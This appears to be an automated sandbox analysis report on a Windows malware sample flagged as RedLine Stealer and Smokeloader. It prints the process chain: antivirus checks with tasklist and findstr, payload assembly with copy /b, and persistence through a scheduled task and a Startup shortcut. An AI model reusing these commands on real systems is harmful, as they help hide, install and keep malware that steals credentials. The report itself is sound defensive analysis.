Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9B22A0	29_2_6C9B22A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA662C0	29_2_6CA662C0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9AA210	29_2_6C9AA210
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9B8220	29_2_6C9B8220
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C978250	29_2_6C978250
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C968260	29_2_6C968260
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C93E3B0	29_2_6C93E3B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9123A0	29_2_6C9123A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9343E0	29_2_6C9343E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C952320	29_2_6C952320
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E8340	29_2_6C8E8340
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA22370	29_2_6CA22370
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C976370	29_2_6C976370
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E2370	29_2_6C8E2370
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9FC360	29_2_6C9FC360
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C97FC80	29_2_6C97FC80
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA1DCD0	29_2_6CA1DCD0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9A1CE0	29_2_6C9A1CE0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8F1C30	29_2_6C8F1C30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E3C40	29_2_6C8E3C40
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA09C40	29_2_6CA09C40
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8D3D80	29_2_6C8D3D80
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA29D90	29_2_6CA29D90
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9B1DC0	29_2_6C9B1DC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C943D00	29_2_6C943D00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C903EC0	29_2_6C903EC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9EDE10	29_2_6C9EDE10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA65E60	29_2_6CA65E60
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA3BE70	29_2_6CA3BE70
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C901F90	29_2_6C901F90
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9FDFC0	29_2_6C9FDFC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA63FC0	29_2_6CA63FC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C98BFF0	29_2_6C98BFF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA37F20	29_2_6CA37F20
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C915F20	29_2_6C915F20
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8D5F30	29_2_6C8D5F30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA3B8F0	29_2_6CA3B8F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C97F8C0	29_2_6C97F8C0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9BF8F0	29_2_6C9BF8F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8ED8E0	29_2_6C8ED8E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9138E0	29_2_6C9138E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C93D810	29_2_6C93D810

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6CA19F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6C8794D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6C903620 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6C86CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6C909B10 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6CA609D0 appears 270 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6C93C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6CA6DAE0 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: String function: 6CA6D930 appears 50 times
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: String function: 00E31A36 appears 34 times
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: String function: 00E40D17 appears 70 times
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: String function: 00E48B30 appears 42 times

Source: h8jGj6Qe78.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000003.00000002.1937968230.0000000000848000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.1937842003.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: h8jGj6Qe78.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ewggbbh.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: svchost015.exe.26.dr	Binary string: \Device\CDROM
Source: svchost015.exe.26.dr	Binary string: \Device\PhysicalMemory
Source: svchost015.exe.26.dr	Binary string: \Device\PhysicalMemoryU
Source: svchost015.exe.26.dr	Binary string: ol, por favorI&taliano, per favore&Portugues, por favorPo&lski..prj.xfcwhxvmem.pos.settings.zip.e01.dd001.ctr.txt.png.mem.memservice_workeredgetmp.tmpemlmsg.jpgheic.pdf;.ps;.tif;.jpg;.png;.gif;.bmp.htmlhtmlxmlsqlitesqlitedbregistryolk14messageedbsnssevtevtxplistbplist.xhdTesseractOCRExcireExcire ForensicsExcire.exe.\!imagespst,ost,edb,dbx,pfc,mbox,eml,emlx,mht,mim,msg,olk14msgsource,olk14message,olk14msgattach,olk15msgattach,olk15msgsource,olk15message,oft,mbs,tnefzip,zipx,7z,rar,tar,gz,tgz,bzip,bz2docx,xlsx,pptx,ppsx,odt,ods,odb,odg,odf,odp,key,numbers,pages,xps,oxps,opendoc,sxw,sxg,sxc,stc,sxm,sxi,sxd,std,stw,sxm,hwpxufdr,ova,gbp,odm,a2w,kmz,kpr,pxl2,bbb,idml,cdr,sbb,notebook,mmap,spd,cdmz,mwb,nbak,pez,artx,cmap,sh3d,dpp,snb,dbk,sps,spv,wpp,jnxthmx,war,otp,xap,dwfx,epub,btapp,u3p,nth,ibooks,3dxml,htmlz,cbz,ear,potx,ppam,xltx,xlsm,dotx,docm,dotx,vsdx,gadget,rbf,eftx,gg,ottjar,apk,ipa,appx,crx,cabzxp,ots,wmz,air,accft,vssx,ipcc,ipsw,xpi;.docx;.pptx;.xlsx;.vsdx;.vsdm;.odt;.odp;.ods.xls;.xlsx;.odsNEARNTNRFlexFilterANDOR (=offline)XWF_MTX_Alt Gr +Ctrl +Shift +Space +Ctrl+Alt +HeaderBlank line(s) found.Power down after x minutesFallback code page for plain text\\\\?\\\.\\\?\Volume{\Device\HarddiskVolume\Device\CdRom... .. FILEBAAD($MFT) WofCompressedDataIndex Record$EFS.PFILENTFS: EA(EA)NO NAME > 0x100x10 < 0x30Unable to terminate worker thread.X-Ways Decompressed [block hash values] [PhotoDNA] [FuzZyDoc]PhotoDNAFuzZyDoc_newTeamsMessagesDataTeamsMeetingsRecoverable Items\DeletionsTop of Personal FoldersSenRec.dirPasswords.txtSearch Terms.txtNewUsers.dirKeywordsLockSpecial Interest.sectorX-Ways SessionSleep(0) Frequency (0..100)non-existent sector debug info123123\|123\|1234\|12345\|123456\|1234567\|12345678\|123456789\|987654321\|abc123\|123abc\|121212\|000000\|666666\|qwerty\|password\|password1\|iloveyou\|monkey\|dragon\|qwertyuiop-------- * ---* ***nLicID& --> --> .journal.exclude.badblocksFile mode:Sequential #TOCBLOCKVMDBVBLKContainerFILETIMEZone.Identifier[ZoneTransfer]System Volume InformationNot enough space for metadata at offset<html>
Source: svchost015.exe.26.dr	Binary string: \Device\harddisk
Source: svchost015.exe.26.dr	Binary string: \Device\Floppy
Source: svchost015.exe.26.dr	Binary string: \Device\Floppy\Device\CDROM\Device\harddisk\partition0SQ

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@47/50@7/6

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E8A6AD GetLastError,FormatMessageW,

25_2_00E8A6AD

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E78DE9 AdjustTokenPrivileges,CloseHandle,		25_2_00E78DE9
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E79399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		25_2_00E79399

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E8B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

25_2_00E8B976

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe

Code function: 0_2_0089C380 CreateToolhelp32Snapshot,Module32First,

0_2_0089C380

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E8C9DA CoInitialize,CoCreateInstance,CoUninitialize,

25_2_00E8C9DA

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E8443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

25_2_00E8443D

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ewggbbh

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\8d14b2cd18
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\329C.tmp

Jump to behavior

Source: Yara match	File source: 29.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\329C.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Teach Teach.bat & Teach.bat & exit

Source: h8jGj6Qe78.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3.dll.29.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.29.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.29.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: svchost015.exe, svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2679610884.000000006CA6F000.00000002.00000001.01000000.0000000E.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.29.dr, nss3[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: svchost015.exe, 0000001D.00000003.2486006722.0000000020D19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: svchost015.exe, 0000001D.00000002.2647841701.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2671824848.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.29.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: h8jGj6Qe78.exe	ReversingLabs: Detection: 42%
Source: h8jGj6Qe78.exe	Virustotal: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\h8jGj6Qe78.exe "C:\Users\user\Desktop\h8jGj6Qe78.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ewggbbh C:\Users\user\AppData\Roaming\ewggbbh
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\329C.exe C:\Users\user\AppData\Local\Temp\329C.exe
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Teach Teach.bat & Teach.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 795933
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "tagsnegotiationthreadadobe" Literature
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Church + ..\Activity + ..\Yahoo + ..\Census + ..\Mario + ..\Postcards + ..\Vessel + ..\Vhs + ..\Maps + ..\Convenience + ..\Comment + ..\Shift z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\795933\Burn.pif Burn.pif z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DFA6.exe C:\Users\user\AppData\Local\Temp\DFA6.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ewggbbh C:\Users\user\AppData\Roaming\ewggbbh
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\329C.exe C:\Users\user\AppData\Local\Temp\329C.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DFA6.exe C:\Users\user\AppData\Local\Temp\DFA6.exe	Jump to behavior
